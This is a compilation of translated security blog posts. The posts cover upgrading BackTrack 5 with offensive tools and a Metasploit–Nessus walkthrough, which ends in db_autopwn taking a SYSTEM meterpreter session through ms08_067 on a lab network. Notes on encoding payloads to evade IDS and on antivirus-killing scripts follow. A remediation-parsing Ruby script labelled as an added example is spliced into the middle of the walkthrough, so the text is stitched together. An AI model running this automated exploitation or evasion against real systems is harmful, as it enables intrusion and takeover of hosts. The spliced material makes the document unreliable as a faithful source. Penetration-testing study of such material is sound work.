[System] Quickly upgrading BackTrack 5 R2 to R3

BT5 R3 was released recently, but you may not want to reinstall the whole system. Below is a very simple way to upgrade R2 to R3.
First, make sure your existing system is fully up to date:
apt-get update && apt-get dist-upgrade
Once the upgrade finishes, all that remains is to install the tools that were added in R3.
Note that the 32-bit and 64-bit tool sets differ slightly, so be sure to choose the correct package list.
32-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r artemisa rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack uberharvest acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
64-Bit Tools:
apt-get install libcrafter blueranger dbd inundator intersect mercury cutycapt trixd00r rifiuti2 netgear-telnetenable jboss-autopwn deblaze sakis3g voiphoney apache-users phrasendrescher kautilya manglefizz rainbowcrack rainbowcrack-mt lynis-audit spooftooph wifihoney twofi truecrack acccheck statsprocessor iphoneanalyzer jad javasnoop mitmproxy ewizard multimac netsniff-ng smbexec websploit dnmap johnny unix-privesc-check sslcaudit dhcpig intercepter-ng u3-pwn binwalk laudanum wifite tnscmd10g bluepot dotdotpwn subterfuge jigsaw urlcrazy creddump android-sdk apktool ded dex2jar droidbox smali termineter multiforcer bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler
OK! The update is complete.
In my own testing I found that some of the packages in the 32-bit list are unavailable, so here is a list that can be run directly.
apt-get install blueranger inundator intersect mercury netgear-telnetenable jboss-autopwn deblaze apache-users kautilya lynis-audit wifihoney twofi acccheck statsprocessor iphoneanalyzer jad javasnoop ewizard websploit dnmap unix-privesc-check dhcpig intercepter-ng laudanum wifite tnscmd10g bluepot subterfuge jigsaw urlcrazy creddump android-sdk apktool ded termineter bbqsql htexploit smartphone-pentest-framework fern-wifi-cracker powersploit webhandler

 

kylin: My BT5 happens to need upgrading too. It is a dual-boot setup and reinstalling would be too much hassle, so I'll just use this method~~~

Permalink: http://www.kylins.org/302.html | kylin's blog | Following network security and internet trends

metasploit db_autopwn & load nessus

Author:bugcx or Anonymous
Url:http://blog.bug.cx/2012/04/16/metasploit-db_autopwn-load-nessus/ | bugcx's blog | Following network security

(Let's get going)
root@bt:~# msfconsole
  +-------------------------------------------------------+
  |  METASPLOIT by Rapid7                                 |
  +---------------------------+---------------------------+
  |      __________________   |                           |
  |  ==c(______(o(______(_()  | |""""""""""""|======[***  |
  |             )=\           | |  EXPLOIT   \            |
  |            // \\          | |_____________\_______    |
  |           //   \\         | |==[msf >]============\   |
  |          //     \\        | |______________________\  |
  |         // RECON \\       | \(@)(@)(@)(@)(@)(@)(@)/   |
  |        //         \\      |  *********************    |
  +---------------------------+---------------------------+
  |      o O o                |        \'\/\/\/'/         |
  |              o O          |         )======(          |
  |                 o         |       .'  LOOT  '.        |
  | |^^^^^^^^^^^^^^|l___      |      /    _||__   \       |
  | |    PAYLOAD     |""\___, |     /    (_||_     \      |
  | |________________|__|)__| |    |     __||_)     |     |
  | |(@)(@)"""**|(@)(@)**|(@) |    "       ||       "     |
  |  = = = = = = = = = = = =  |     '--------------'      |
  +---------------------------+---------------------------+
       =[ metasploit v4.3.0-dev [core:4.3 api:1.0]
+ -- --=[ 831 exploits - 470 auxiliary - 143 post
+ -- --=[ 250 payloads - 27 encoders - 8 nops
       =[ svn r15107 updated yesterday (2012.04.14)
msf > load nessus
[*] Nessus Bridge for Metasploit 1.1
[+] Type nessus_help for a command listing
[*] Successfully loaded plugin: nessus
msf > nessus_help
[*]
Command                    Help Text
-------                    ---------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
-----------------          -----------------
Generic Commands
Plugin Commands
Policy Commands
Reports Commands
Scan Commands
User Commands
nessus_admin               Checks if user is an admin
nessus_connect             Connect to a nessus server
nessus_find_targets        Try to find vulnerable targets from a report
nessus_help                Listing of available nessus commands
nessus_logout              Logout from the nessus server
nessus_plugin_details      List details of a particular plugin
nessus_plugin_family       List plugins in a family
nessus_plugin_list         Displays each plugin family and the number of plugins
nessus_policy_del          Delete a policy
nessus_policy_list         List all polciies
nessus_report_get          Import a report from the nessus server in Nessus v2 format
nessus_report_host_detail  Detail from a report item on a host
nessus_report_host_ports   Get list of open ports from a host from a report
nessus_report_hosts        Get list of hosts from a report
nessus_report_list         List all Nessus reports
nessus_save                Save nessus login info between sessions
nessus_scan_new            Create new Nessus Scan
nessus_scan_pause          Pause a Nessus Scan
nessus_scan_pause_all      Pause all Nessus Scans
nessus_scan_resume         Resume a Nessus Scan
nessus_scan_resume_all     Resume all Nessus Scans
nessus_scan_status         List all currently running Nessus scans
nessus_scan_stop           Stop a Nessus Scan
nessus_scan_stop_all       Stop all Nessus Scans
nessus_server_feed         Nessus Feed Type
nessus_server_prefs        Display Server Prefs
nessus_server_status       Check the status of your Nessus Server
nessus_user_add            Add a new Nessus User
nessus_user_del            Delete a Nessus User
nessus_user_list           Show Nessus Users
nessus_user_passwd         Change Nessus Users Password
[*]

Connect to Nessus

msf > nessus_connect fuckyou:123456@192.168.8.9 ok
[*] Connecting to https://192.168.8.9:8834/ as fuckyou
[*] Authenticated
msf >

Add a Nessus user

msf > nessus_user_add
[*] Usage:
[*] nessus_user_add <username> <password>
[*] Only adds non admin users
msf > nessus_user_add xxxooo 123456
[+] xxxooo has been added

List the users

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   FALSE      08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970

We see that xxxooo is not an admin, so we promote it to admin

root@bt:/opt/nessus/sbin# ./nessus-admin
Login : xxxooo
xxxooo is NOT an administrative user. Do you want to grant him admin rights? [y/n] y
xxxooo is now an administrator
root@bt:/opt/nessus/sbin#

Now look at the users again

msf > nessus_user_list
[+] There are 3 users
[+] Nessus users
[+]
Name     Is Admin?  Last Login
----     ---------  ----------
fuckyou  TRUE       14:26 Apr 16 2012
xxxooo   TRUE       08:00 Jan 01 1970
xxxxxx   TRUE       08:00 Jan 01 1970
msf >

Choose a scan policy

msf > nessus_policy_list
[+] Nessus Policy List
[+]
ID  Name                                         Comments
--  ----                                         --------
-1  Prepare for PCI-DSS audits (section 11.2.2)
-2  Web App Tests
-3  External Network Scan
-4  Internal Network Scan
msf > nessus_scan_new
[*] Usage:
[*]        nessus_scan_new <policy id> <scan name> <targets>
[*]        use nessus_policy_list to list all available policies
msf > nessus_scan_new -2 fuck 192.168.8.5
[*] Creating scan from policy number -2, called "fuck" and scanning 192.168.8.5
[*] Scan started.  uid is a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd

Check the scan status

msf > nessus_scan_status
[+] Running Scans
[+]
Scan ID                                               Name  Owner    Started            Status   Current Hosts  Total Hosts
-------                                               ----  -----    -------            ------   -------------  -----------
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  fuckyou  05:40 Apr 16 2012  running  0              1
[+]
[*] You can:
[+]         Import Nessus report to database :  nessus_report_get <reportid>
[+]         Pause a nessus scan :           nessus_scan_pause <scanid>
msf >

List the scan reports

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
a7d66781-fce6-e675-a9d8-d14fa44186c60ed9f72686359bfd  fuck  running    06:04 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

Once the scan finishes, the status changes to completed

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf >

Query the details of a specific scan report

msf > nessus_report_hosts 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Report Info
[+]
Hostname     Severity  Sev 0  Sev 1  Sev 2  Sev 3  Current Progress  Total Progress
--------     --------  -----  -----  -----  -----  ----------------  --------------
192.168.8.1  19        8      19     0      0      48026             48026
192.168.8.2  25        8      24     1      0      48026             48026
192.168.8.3  29        8      28     1      0      48026             48026
192.168.8.4  25        6      24     1      0      48026             48026
192.168.8.5  66        13     56     4      6      48026             48026
192.168.8.6  20        6      19     1      0      48026             48026
192.168.8.7  387       13     84     49     254    48026             48026
192.168.8.8  64        5      47     8      9      48026             48026
[*] You can:
[*]         Get information from a particular host:          nessus_report_host_ports <hostname> <report id>
msf >

List the scan results for a specific IP

msf > nessus_report_host_ports 192.168.8.7 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Host Info
[+]
Port  Protocol  Severity  Service Name   Sev 0  Sev 1  Sev 2  Sev 3
----  --------  --------  ------------   -----  -----  -----  -----
0     icmp      1         general        0      2      0      0
0     tcp       1         general        0      21     0      0
0     udp       1         general        0      1      0      0
123   udp       1         ntp?           1      1      0      0
135   tcp       1         epmap          1      2      0      0
137   udp       1         netbios-ns     1      2      0      0
138   udp       1         netbios-dgm?   1      1      0      0
139   tcp       1         smb            1      2      0      0
445   udp       1         microsoft-ds?  1      1      0      0
445   tcp       3         cifs           1      26     42     253
500   udp       1         isakmp?        1      1      0      0
1025  tcp       1         dce-rpc        1      2      0      0
1041  tcp       1         dce-rpc        1      2      0      0
3389  tcp       3         msrdp          1      3      2      1
3790  tcp       2         www            1      16     5      0
4500  udp       1         ipsec-nat-t?   1      1      0      0
[*] You can:
[*]         Get detailed scan infromation about a specfic port: nessus_report_host_detail <hostname> <port> <protocol> <report id>
msf >

View the scan details for a specific port on a specific IP address

msf > nessus_report_host_detail 192.168.8.7 3389 tcp 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[+] Port Info
[+]
Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
----              --------  --------  -----------                                                                                                     -----  --------  ---                -----------  -----------
msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
msrdp (3389/tcp)  1         10940     Windows Terminal Services Enabled                                                                               none   .         []                 None         .
msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  1         30218     Terminal Services Encryption Level is not FIPS-140 Compliant                                                    2.6    .         []                 Low          CVSS2#AV:N/AC:H/Au:N/C:P/I:N/A:N
msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      ["CVE-2005-1794"]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      ["CVE-2012-0002"]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
msf >
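As an added example, not code from the original post: a small Ruby script that parses a nessus_report_host_detail table of the kind shown above and orders the findings for remediation, exploitable and high-CVSS items first. The sample rows are constructed to match the page's layout, and the function names are my own.

```ruby
require 'json'

# Column order of the "Port Info" table printed by nessus_report_host_detail.
FIELDS = %i[port severity plugin_id plugin_name cvss2 exploit cve risk_factor cvss_vector].freeze

# Constructed sample in the same layout as the page's table (columns are
# separated by two or more spaces); the CVE column is a JSON-style array.
SAMPLE_HOST_DETAIL = <<~TABLE
  Port              Severity  PluginID  Plugin Name                                                                                                     CVSS2  Exploit?  CVE                Risk Factor  CVSS Vector
  ----              --------  --------  -----------                                                                                                     -----  --------  ---                -----------  -----------
  msrdp (3389/tcp)  1         34252     Microsoft Windows Remote Listeners Enumeration (WMI)                                                            none   .         []                 None         .
  msrdp (3389/tcp)  2         57690     Terminal Services Encryption Level is Medium or Low                                                             4.3    .         []                 Medium       CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N
  msrdp (3389/tcp)  2         18405     Microsoft Windows Remote Desktop Protocol Server Man-in-the-Middle Weakness                                     5.1    true      ["CVE-2005-1794"]  Medium       CVSS2#AV:N/AC:H/Au:N/C:P/I:P/A:P
  msrdp (3389/tcp)  3         58435     MS12-020: Vulnerabilities in Remote Desktop Could Allow Remote Code Execution (2671387) (uncredentialed check)  9.3    true      ["CVE-2012-0002"]  High         CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C
TABLE

# Turn the table text into an array of hashes, one per finding.
# Header, underline and "[*]"/"[+]" status lines are skipped; a row that does
# not have exactly the expected number of columns is ignored, not mis-parsed.
def parse_host_detail(text)
  text.each_line.with_object([]) do |line, rows|
    line = line.rstrip
    next if line.empty? || line.start_with?('Port ', '[') || line =~ /\A[-\u2013\u2014]{2,}/
    cols = line.split(/\s{2,}/)
    next unless cols.size == FIELDS.size
    row = FIELDS.zip(cols).to_h
    row[:severity]  = row[:severity].to_i
    row[:plugin_id] = row[:plugin_id].to_i
    row[:cvss2]     = row[:cvss2] == 'none' ? 0.0 : row[:cvss2].to_f
    row[:exploit]   = row[:exploit] == 'true'
    row[:cve]       = JSON.parse(row[:cve]) # "[]" or "[\"CVE-...\"]"
    rows << row
  end
end

# Remediation order: findings with a known exploit first, then by CVSS score,
# then by Nessus severity.
def prioritize(rows)
  rows.sort_by { |r| [r[:exploit] ? 0 : 1, -r[:cvss2], -r[:severity]] }
end

# CVEs behind findings for which an exploit exists, highest CVSS first.
def exploitable_cves(rows)
  prioritize(rows).select { |r| r[:exploit] }.flat_map { |r| r[:cve] }
end

# Findings reachable over the network (CVSS2 access vector AV:N) at or above
# a CVSS threshold: the ones to patch or firewall first.
def network_exposed(rows, min_cvss: 7.0)
  rows.select { |r| r[:cvss2] >= min_cvss && r[:cvss_vector].include?('AV:N') }
end

# One summary line per finding, in remediation order.
def remediation_report(rows)
  prioritize(rows).map do |r|
    cves = r[:cve].empty? ? '-' : r[:cve].join(',')
    format('%-6d cvss=%-4.1f exploit=%-5s %-16s %s',
           r[:plugin_id], r[:cvss2], r[:exploit], cves, r[:plugin_name])
  end
end

if __FILE__ == $PROGRAM_NAME
  puts remediation_report(parse_host_detail(SAMPLE_HOST_DETAIL))
end
```

Pasting the real msf output into a file and reading it with File.read in place of the constructed sample gives the same prioritized list for a live report.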

Import a scan report

msf > nessus_report_get
[*] Usage:
[*]        nessus_report_get <report id>
[*]        use nessus_report_list to list all available reports for importing
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.9
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

View the scanned hosts

msf > hosts -c address,os_name,os_flavor,os_sp,vulns
Hosts
=====
address       os_name                   os_flavor  os_sp  vulns
-------       -------                   ---------  -----  -----
10.0.2.15     Microsoft Windows         XP         SP3    0
192.168.8.1   Linux                                       17
192.168.8.2   Microsoft Windows         7                 17
192.168.8.3   Microsoft Windows         2003       SP2    21
192.168.8.4   Microsoft Windows         7                 17
192.168.8.5   Microsoft Windows         2003       SP2    289
192.168.8.6   Microsoft Windows         XP                20
192.168.8.7   Microsoft Windows         2003       SP2    369
192.168.8.8   Linux  3.2.6 on Ubuntu 1                    48

View the vulnerabilities found on the scanned hosts

msf > vulns
[*] Time: 2012-04-16 06:14:35 UTC Vuln: host=192.168.8.7 name=DCE Services Enumeration refs=NSS-10736
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Traceroute Information refs=NSS-10287
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Nessus Scan Information refs=NSS-19506
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Windows Summary of Missing Patches refs=NSS-38153
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Common Platform Enumeration (CPE) refs=NSS-45590
[*] Time: 2012-04-16 06:16:46 UTC Vuln: host=192.168.8.7 name=Microsoft Office Detection refs=NSS-27524
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Device Type refs=NSS-54615
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=OS Identification refs=NSS-11936
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Disabled accounts refs=OSVDB-752,NSS-10913
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : Passwords never expire refs=OSVDB-755,NSS-10916
[*] Time: 2012-04-16 06:16:47 UTC Vuln: host=192.168.8.7 name=Microsoft Windows - Local Users Information : User has never logged on refs=OSVDB-754,NSS-10915

... (omitted)

We can also use auto_exploit to exploit the targets in batch.
Start PostgreSQL and create a database

root@bt:/opt/nessus/sbin# /etc/init.d/postgresql-8.4 start
 * Starting PostgreSQL 8.4 database server
root@bt:~# psql -U postgres -h localhost
用户 postgres 的口令:
psql (8.4.10)
SSL连接 (加密:DHE-RSA-AES256-SHA,位元:256)
输入 “help” 来获取帮助信息.
postgres=# CREATE DATABASE fuck;
CREATE DATABASE
postgres=#

Connect msf to PostgreSQL

msf > db_status
[*] postgresql connected to msf3dev
msf > db_connect postgres:123456@localhost:5432/fuck

List the Nessus reports and import one

msf > nessus_report_list
[+] Nessus Report List
[+]
ID                                                    Name  Status     Date
--                                                    ----  ------     ----
30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db  fuck  completed  06:04 Apr 16 2012
63801a95-dae6-677a-c0ae-24e23db0ef4bd95ca44becc57f34  xxxx  completed  05:37 Apr 16 2012
[*] You can:
[*]         Get a list of hosts from the report:          nessus_report_hosts <report id>
msf > nessus_report_get 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] importing 30d36481-b570-f399-dc5d-9b057274dc22aae62b3d816166db
[*] 192.168.8.8
[*] 192.168.8.7
[*] 192.168.8.6
[*] 192.168.8.5
[*] 192.168.8.4
[*] 192.168.8.3
[*] 192.168.8.2
[*] 192.168.8.1
[+] Done
msf >

Load auto_exploit and run vuln_exploit

msf > load auto_exploit
[*] auto_exploit plug-in loaded.
[*] Successfully loaded plugin: auto_exploit
msf > vuln_exploit -h
OPTIONS:
    -f <opt>  Provide a comma separated list of IP's and Ranges to skip when running exploits.
    -h        Command Help
    -j <opt>  Max number of concurrent jobs, 3 is the default.
    -m        Only show matched exploits.
    -r <opt>  Minimum Rank for exploits (low, average,normal,good,great and excellent) good is the default.
    -s        Do not limit number of sessions to one per target.
msf > vuln_exploit
(a Ruby error occurred at this point; output omitted)

Or, better, use db_autopwn

msf > load db_autopwn
msf > db_autopwn -t -e -p
... (omitted)
[*] (535/535 [1 sessions]): Waiting on 10 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 5 launched modules to finish execution…
[*] (535/535 [1 sessions]): Waiting on 0 launched modules to finish execution…
[*] The autopwn command has completed with 1 sessions
[*] Enter sessions -i [ID] to interact with a given session ID
[*]
[*] ================================================================================
Active sessions
===============
  Id  Type                   Information                            Connection                                            Via
  --  ----                   -----------                            ----------                                            ---
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)  exploit/windows/smb/ms08_067_netapi
[*] ================================================================================
msf > sessions -l
Active sessions
===============
  Id  Type                   Information                            Connection
  --  ----                   -----------                            ----------
  1   meterpreter x86/win32  NT AUTHORITY\SYSTEM @ SB-43E30C43F14F  192.168.8.9:42218 -> 192.168.8.5:32698 (192.168.8.5)
msf > sessions -i 1
[*] Starting interaction with 1...
meterpreter > ipconfig
Interface  1
============
Name         : MS TCP Loopback interface
Hardware MAC : 00:00:00:00:00:00
MTU          : 1520
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
Interface 65539
============
Name         : AMD PCNET Family PCI Ethernet Adapter
Hardware MAC : 08:00:27:0d:dd:65
MTU          : 1500
IPv4 Address : 192.168.8.5
IPv4 Netmask : 255.255.255.0
meterpreter > background
[*] Backgrounding session 1...

auto_exploit.rb:auto_exploit

Metasploit Framework Rambling Notes: Various Topics

1. Directory structure

metasploit framework
Go into the update directory
Type svn update to update the files

MSF directory structure:
data: contains the meterpreter, PassiveX and VNC DLLs, some user-interface code such as msfweb, and data files used by various plugins

documentation: contains the MSF documentation, sample Ruby scripts and the MSF API

external: contains the source code of the meterpreter, VNC and PassiveX payloads

lib: contains the Ruby libraries used by MSF

modules: contains the exploits, payloads, nops, encoders and auxiliary modules

plugins: contains the database connection plugins, IPS filtering code and other plugin code

scripts: contains meterpreter scripts that can be run through the Ruby shell; at present these include scripts to kill antivirus on the target system and to migrate the meterpreter server instance into another process

.svn: contains the files and data used by the Subversion client to connect to the repository server

tools: contains various useful scripts and miscellaneous tools

2. Core commands

msfconsole core commands
msfconsole
Multiple sessions can run concurrently, and commands such as sessions and jobs let you interact with them:
you can list and kill running jobs, and create multiple sessions from a single exploit,
which means one exploit can be launched against a user-specified list of hosts.
Sessions can be sent to the background with ctrl+z and stopped with ctrl+c.
MSF ships with a powerful set of APIs that can be accessed through msfconsole;
switching to the interactive Ruby shell makes low-level interaction with sessions and the Framework possible.

Core commands:
? Help menu
back Move back from the current context
banner Display an MSF banner
cd Change directory
color Toggle color
connect Connect to a host
exit Exit MSF
help Help menu
info Display information about one or more modules
irb Drop into irb scripting mode
jobs Display and manage jobs
kill Kill a job
load Load a plugin
loadpath Search for and load modules from a path
quit Exit MSF
resource Run the commands stored in a file
route View the routing information for a session
save Save the current settings
search Search module names and descriptions
set Assign a value to a variable
setg Assign a value to a global variable
show Display modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
unload Unload a module
unset Unset one or more variables
unsetg Unset one or more global variables
use Select a module by name
version Show the MSF and console library version numbers

3. Metasploit function modules

Metasploit function modules || main MSF commands || database commands

-------------------------------------------------
exploits:

Put simply, these are the exploit programs for different known vulnerabilities.
When we run show exploits, three columns are displayed:
exploit name, rank, description
Exploit naming convention:
operating system/service/module name
e.g. windows/vnc/realvnc_client
The rank indicates how reliable the exploit is
The description is a short summary of the vulnerability
View detailed information about an exploit: info <module name>

Select an exploit: use exploits/windows/vnc/real_vnc_client
List the exploit's options: show options
Options marked required in the options list must be set
List the target types the exploit can attack: show targets
Set an option: set <option> <value> (e.g. set RHOST 192.168.0.1)
Set the target: set TARGET <number> (e.g. set TARGET 2)
-------------------------------------------------
payloads module

A payload is the shellcode, i.e. what is to be done once the vulnerability has been exploited successfully; MSF provides a large number of usable payloads.
Once we have selected an exploit module and set its options, we can use show payloads to see which payloads the current exploit can use.
Payload naming convention:
operating system/type/name, e.g. windows/shell/bind_tcp
The main types are:
shell: obtain a shell
dllinject: upload a DLL and inject it into a process
patchup***: patch the vulnerability
upexec: upload and execute a file
meterpreter: advanced payload
vncinject: advanced payload
passiveX: advanced payload
Payload name conventions:
--shell_find_tag: create a shell on an already established connection
--shell_reverse_tcp: connect back to the attacker host and create a shell
--bind_tcp: listen for a TCP connection
--reverse_tcp: establish a reverse TCP connection
--reverse_http: communicate through an HTTP tunnel and create a new user added to the administrators group
--add_user: create a new user and add it to the administrators group
--xxx_ipv6_tcp: IPv6-based
--xxx_nonx_tcp: for systems without No eXecute support, or Win7 (NX is a CPU feature that helps prevent buffer overflows)
--xxx_ord_tcp: ordinal payload
--xxx_tcp_allports: on every possible port
--for a detailed explanation see http://www.offensice-security.com/metasploit-unleashed/A-Bit-About-Payloads
Set the payload: set PAYLOAD payload_name
List the options, again with: show options
Then set the options: set RHOST 192.168.0.1
With that, the exploit and payload are configured and we can exploit the target host.
Because payloads are just sequences of assembly instructions, usually preceded by NOPs,
this can serve as a signature for detecting these attacks; payloads therefore need to be encoded and the NOPs varied in order to evade IDS or IPS detection.
MSF provides a number of encoders as well as several NOP generators
to make detection extremely difficult.
-------------------------------------------------

Demonstration of an attack example:

attacking by MSF
Walk through a simple example
Remote exploitation of a Windows server
Explanation of the ms08067 example

CTRL+Z sends the session to the background
sessions
Shows information about the background sessions
sessions -h
sessions -i 1 // re-enter the connection
CTRL+C disconnects

----------------------------
Execution flow:
1. Connect to the vulnerable port on the remote system
2. Exchange the protocol sequence until the vulnerability trigger point is reached
3. Inject the exploit code, which contains instructions that directly or indirectly overwrite the return address with our payload, plus NOP instructions;
this increases the chance that our code gets executed
4. Post-exploitation, which may be a newly created user connecting to the remote system or possibly a GUI client to the remote system
-------------------------------------------------
The auxiliary, encoders and nops modules

nops: often the exact location to jump to in the shellcode is not known; NOPs need to be prepended to the actual exploit, and they also help avoid triggering IDS
encoders: similar in purpose to nops, since payloads can also trigger IDS. Encoding the payload lets it avoid detection on the network; it is decoded on the target and executed as planned.
auxiliary: a collection of helper modules for fingerprinting, vulnerability scanning, brute forcing, SQL injection, DoS, spoofing, sniffing, vulnerability discovery and so on
-------------------------------------------------
Msfcli interface
The msfcli interface lets the user run exploits directly from the command line without starting msfconsole first. This suits launching attacks quickly by specifying the arguments directly on the command line, which is very useful when a large number of systems need to be tested for the same vulnerability.
You can also write a simple shell script that takes an IP range and runs the exploit against each target system in turn.
msfcli -h shows the help
S: show module information
P: available payloads
O: options
T: available targets
E: execute the exploit
--------
A simple example:
1. Show information about the selected exploit module
./msfcli <exploit_name> S
2. Show the available payloads:
./msfcli <exploit_name> P
3. Choose a payload for the exploit and show the options that need to be set
./msfcli <exp> PAYLOAD=<payload> O
4. Set the required options and list the available targets:
./msfcli <exp> payload=<payload> option=value T
5. Set the target and run the exploit
./msfcli <exp> payload=<payload> option=value target=number E
------------------------------
The msfweb user interface provides a friendly web interface that makes the modules easy to use:
exploits: exploit modules, with a search function
auxiliarys: auxiliary modules, with a search function
Payloads: payload modules, with a search function
console: a web-based console, equivalent to msfconsole
sessions: session module, showing current session information
options: style settings
about: msfweb version information
-------------------------------------------------
msfd interface
The msfd tool opens a network interface to msfconsole. It can be run on a specified IP address and listens on a port for incoming connections, allowing one or more users to connect into msf from remote systems.
Example:
local host: msfd -a 192.168.1.14 -p 2323
remote host: nc 192.168.1.14 2323
To disconnect on the local host:
taskkill /pid <process id> /f [force close]
Note that the IP address configured must be the local host's own IP address; other IP addresses will not work.
-------------------------------------------------
msfpayload and msfencode

msfpayload: this tool lets the user modify existing payloads from the command line and obtain C, Perl or raw output. The -h argument lists the options we can use, and the S option shows detailed information about a specific payload. After selecting a particular payload we can modify it with msfpayload: the C option outputs it in C program format, the P option outputs it as a Perl script, and raw format can also be produced, which allows it to be passed to another program such as msfencode or redirected into a file. We need to set the payload's CMD parameter to create the specific command to run after successful exploitation. Taking a dir command with Perl script output as the example: ./msfpayload windows/exec CMD=dir P

msfencode: this utility is a framework that gives direct access to the payload encoders. The -l argument lists the available encoders and -h lists the options. Using msfpayload is a simple way to generate a raw-format payload, which can be piped directly into msfencode or read from a file. Encoding ensures that bad characters do not appear in the payload and, in the end, also improves IDS evasion.
bad characters:
Many applications filter or sort their input when accepting it; for example, a web server may pre-process Unicode-encoded input before it reaches the vulnerable code, so the payload may be altered and fail to run properly.
Some characters also end up terminating the string, such as the NULL byte (0x00); these must be avoided as well. Determine which characters will be pre-processed, then modify the payload accordingly.
----------------------
database backend commands
MSF supports several different databases, currently SQLite3 (driver bundled), MySQL and PostgreSQL, used to detect target vulnerabilities and exploit them automatically. After an amap, nmap or Nessus scan report has been loaded, it can attempt exploitation automatically based on the target's open ports and likely vulnerabilities, which greatly improves a penetration tester's efficiency.
Database backend commands:
db_add_host Add one or more hosts to the database
db_add_note Add a note to a host
db_add_port Add a port to a host
db_connect Connect to an existing database instance
db_create Create a new database instance
db_del_host Delete one or more hosts from the database
db_del_port Delete a port from the database
db_destroy Delete an existing database
db_disconnect Disconnect from the current database instance
db_driver Specify a database driver
db_hosts List all hosts in the database
db_nmap Execute Nmap and record the output
db_notes List all notes in the database
db_services List all services in the database
db_vulns List all vulnerabilities in the database
db_workspaces Switch database workspaces
db_import_ip_list Import a file containing a list of IPs
db_import_amap_mlog Import a THC-Amap scan result file (-o, -m)
db_import_nessus_nbe Import a Nessus scan result file (NBE)
db_import_nessus_xml Import a Nessus scan result file (XML)
db_import_nmap_xml Import an Nmap scan result file (-oX)
db_autopwn Automatic exploitation

4. db_autopwn
db_autopwn
Arguments:
-h Show help
-t Show all matching exploit modules
-x Select modules based on vulnerability references
-p Select modules based on open ports
-e Launch every exploit that matches a target
-r Use a reverse connect shell
-b Use a bind shell on a random port
-q Disable exploit output
-l [range] Only exploit hosts inside this range
-X [range] Always exclude hosts inside this range
-PI [range] Only exploit hosts with these ports open
-PX [range] Always exclude hosts with these ports open
-m [regex] Only run modules whose name matches the regular expression
-------------------------------------
A successful example:
db_nmap -sV 192.168.1.110 --- scan the host
db_autopwn -p -e -b --- connect automatically || attack

